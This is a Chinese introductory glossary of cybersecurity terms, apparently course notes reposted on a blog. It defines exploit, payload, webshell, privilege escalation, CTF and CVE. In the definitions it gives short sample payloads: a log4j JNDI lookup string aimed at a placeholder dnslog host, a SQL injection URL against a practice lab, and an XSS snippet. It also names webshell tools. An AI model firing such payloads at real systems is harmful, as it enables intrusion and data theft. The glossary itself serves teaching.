第一章-網絡安全行業

1.1-什么是網絡安全

概念

網絡安全：網絡空間安全（Cyber Security）

信息系統

信息系統（Information System），是由計算機硬件、網絡和通信設備、計算機軟件、信息資源、信息用戶和規章制度組成的以處理信息流為目的的人機一體化系統。

信息系統安全三要素（CIA）（面試基礎考點）

• 保密性（confidentiality） [?k?nf??den?i??l?ti]
• 完整性（Integrity） [?n?teɡr?ti]
• 可用性（Availability） [??ve?l??b?l?ti]

其他（了解）

• 抗抵賴性
• 可控性
• 真實性、時效性、合規性、公平性、可靠性、隱私性

網絡空間安全

包括了國家安全、城市安全、經濟安全、社會安全、生產安全、人身安全等在內的“大安全”

國家網絡空間安全戰略

網絡空間和海、陸、空、天，并稱為五大空間或五大疆域

http://www.cac.gov.cn/2016-12/27/c_1120195926.htm

網絡空間關注點

• 信息系統——網絡空間域、物理空間域社會空間域
• 技術——法律、政策、技術、管理、產業、教育
• 信息系統生命周期——時時刻刻

網絡空間管理

《中華人民共和國網絡安全法》

《Cybersecurity Law of the People Republic of China》

網絡空間安全管理流程

確定網絡信息安全管理對象；

評估網絡信息安全管理對象的價值；

識別網絡信息安全管理對象的威脅；

識別網絡信息安全管理對象的脆弱性；

確定網絡信息安全管理對象的風險級別；

制定網絡信息安全防范體系及防范措施；

實施和落實網絡信息安全防范措施；

運行/維護網絡信息安全設備、配置。

1.2-安全常用術語1

黑客hacker：對計算機非常擅長的人，竊取數據、破壞計算機系統（anonymous）

腳本小子：剛剛入門安全行業，學習了一些技術，只會只用現成的工具或者從網上復制代碼

白帽子：白帽子的目的是發現企業的漏洞并且上報給企業，幫助其解決風險問題（360補天、漏洞盒子、CNVD、CNNVD）

紅帽黑客：有正義感、愛國的黑客，利用技術維護國家網絡安全，并且對外來的攻擊進行反擊

漏洞（vulnerability，簡稱vul或vuln)：指的是硬件、軟件、協議等等存在的安全缺陷（http://www/cnnvd.org.cn/web/wz/bzxqByld.tag?id=3&mkid=3）

POC（Proof of Concept）:能證明漏洞存在的代碼（例：${jndi:ldap://xxxxxx.dnslog.cn/test}

exp（Exploit——利用）：執行了這一段利用代碼之后，就能夠達到攻擊的目的（msf）

payload：攻擊載荷；SQL注入——http://localhost/sqli-labs/Less-3/?id=-1’)union select 1,1,database() --+；XSS——< script>alter(1)</ script>；log4j——${jndi:ldap://xxxxxx.domain.cn/test}

0day：使用量非常大的通用產品漏洞已經被發現了（還沒有公開），官方還沒有發布補丁或者修復方法的漏洞

1day：漏洞的POC和EXP已經被公開了，但是很多人還來不及修復，這個叫1day漏洞

Nday漏洞：指已經發布官方補丁的漏洞，并且時間已經過去很久的漏洞。

漏掃：基于數據庫對漏洞進行自動化掃描

補丁（patch）：漏洞的修復程序

1.2-安全常用術語2

滲透（penetration）：黑客入侵了網站或者計算機系統，獲取到控制計算機權限的過程

滲透測試（penetration test）：用黑客入侵的方式對系統進行安全測試，目的是找出和修復安全漏洞，在這個過程中不會影響系統的正常運行，也不會破壞數據

木馬（Trojan horse）：隱藏在計算機中的惡意程序

病毒（Virus）：惡意代碼或程序

殺毒軟件：瑞星、江民、金山、國外的諾頓、卡巴斯基、McAfee、360

免殺：繞過殺毒軟件

肉雞：已經被黑客獲得權限的機器，可能是個人電腦也可能是企業或者政府單位的服務器，通常情況下因為使用者并不知道已經被入侵，所以黑客可以長期獲得權限和控制。

抓雞：利用出現概率非常高漏洞（比如log4j、永恒之藍），使用自動化獲取肉雞的行為

跳板機：黑客為了防止被追溯和識別身份，一般都不會用自己的電腦發起攻擊，而是利用獲取的肉雞來攻擊其他目標，這個肉雞就充當一個跳板的角色

DDoS（Distributed Denial of Service——分布式拒絕服務攻擊）：發起大量惡意請求，導致正常用戶無法訪問

后門（backdoor）：黑客為了對主機進行長期的控制，在機器上種植的一段程序或留下一個“入口”

中間人攻擊（Man-in-the-Middle Attack——MITM攻擊）：運行中間服務器，攔截并篡改數據

網絡釣魚：釣魚網站指的是冒充的網站，用來竊取用戶的賬號密碼

1.2-安全常用術語3

webshell：

shell是一種命令執行工具，可以對計算機進行控制；

webshell就是asp、php、jsp之外的web代碼文件，通過這些代碼文件可以執行任意的命令，對計算機做任意的操作

分類：小馬；一句話木馬——godzilla\behinder\ant sword；大馬

Getshell：獲得命令執行環境的操作；

Redis的持久化功能、MySQL的寫文件功能、MySQL的日志記錄功能、上傳功能、數據備份功能、編輯器

提權：權限提升——Privilege Escalation；

普通用戶權限，把自己提升為管理員權限的操作就叫做提權——www——root

拿站：指得到一個網站最高權限，即得到后臺和管理員名字和密碼

拖庫（脫褲）：拖庫指的是網站被入侵以后，黑客把所有的數據都導出，竊取到了數據文件

撞庫：用獲得的褲子去批量登陸其他的網站

旁站入侵：入侵同服務器的其它網站

橫向移動：攻擊者入侵一臺服務器成功后，基于內部網絡，繼續入侵同網段的其他機器

代理（Proxy）：幫我們發起網絡請求的一臺服務器

VPN（Virtual Private Network）：代理；加密通信；辦公——在家里連接到公司內網

蜜罐（Honeypot）：吸引攻擊者攻擊的偽裝系統，用來實現溯源和反制

沙箱（Sandbox）：沙箱是一種按照安全策略限制程序行為的執行環境，就算有惡意代碼，也只能影響沙箱環境而不會影響到操作系統

靶場：模擬的有漏洞的環境；

可以是網站、容器、操作系統；

類型：

web綜合靶場——DVWA、pikachu、bwapp

web專用靶場——sqli-labs、upload-labs、xsslabs

漏洞復現靶場——比如CVE 44228

操作系統靶場——比如vulnhub靶場

CTF靶場——專門用來練習CTF題目，每個人都有一個獨立的環境

堡壘機：跳板機——jumpserver；

運維審計系統——管理資源，審批、審計、訪問控制、事件記錄

WAF：Web Application Firewall——Web應用防火墻；

對HTTP/HTTPS的流量內容進行分析，攔截惡意攻擊行為

1.2-安全常用術語4

APT（Advanced Persistent Threat）：APT攻擊；

高級可持續威脅攻擊，指某組織在網絡上對待定對象展開的持續有效的攻擊活動；

報告：2021深信服APT攻防趨勢半年洞察

護網（HVV）：國家組織牽頭組織事業單位，國企單位，名企單位等開展攻防兩方的網絡安全演習

CTF：

Capture The Flag奪旗賽：起源于1996年DEFCON全球黑客大賽；解出題目，獲得flag，就可以得分

是一種黑客技術競賽：解題形式——Jeopardy；

攻防形式——Attack-Defense

方向：Reverse、PWN、Web、Crypto、Misc、Mobile

在線CTF：bugku——https://ctf.bugku.com/challenges/index.html

北京聯合大學——https://buuoj.cn/challenges

CTFHub——https://www.ctfhub.com/

bmzCTF——http://bmzclub.cn/challenges

攻防世界——https://adworld.xctf.org.cn

CTFSHOW——https://ctf.show/challenges

CVE：Common Vulnerabilities and Exposures——通用漏洞披露；

Mitre；

例如：CVE-2021-44228

https://www.cve.org/

CNVD：國家信息安全漏洞共享平臺——https://www.cnvd.org.cn/;

國家計算機應急響應中心CNCERT維護——https://www.cert.org.cn/publish/main/index.html

應急響應：一個公司為了應對各種安全事件所做的準備和事后采取的措施

SRC：Security Response Center——企業的應急響應中心;

http://0xsafe.org/

公益SRC：https://www.vulbox.com/;

https://src.sjtu.edu.cn/

網絡空間測繪：網絡空間資源收錄；

網絡空間搜索引擎：www.shodan.io

fofa.so

www.zoomeye.org

ATT&CK：Adversarial Tactics，Techniques，and Common Knowledge——對抗戰術、技術和通用知識（攻擊者技術的知識庫）；

Mitre；

風險分析模型——收集威脅情報，模擬APT攻擊

逆向（reverse）：把程序還原為源代碼，分析程序的運行過程

DevOps（Development+Operations）：開發測試運維一體化

CICD：

包括：持續集成（Continuous Integration）

持續交付（Continuous Delivery）

持續部署（Continuous Deployment）

具體技術——Git代碼管理、Jenkins版本管理、代碼掃描、自動化測試

DevSecOps（Development + Security + Operations）：安全開發與運維

等保：網絡安全等級保護；

要求相關行業的單位和公司的信息系統必須進行定級，然后在公安機關備案，然后建設整改，然后由測評機構評級，并且持續維護和監督

總結

以上是生活随笔為你收集整理的章节1 网络安全行业的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。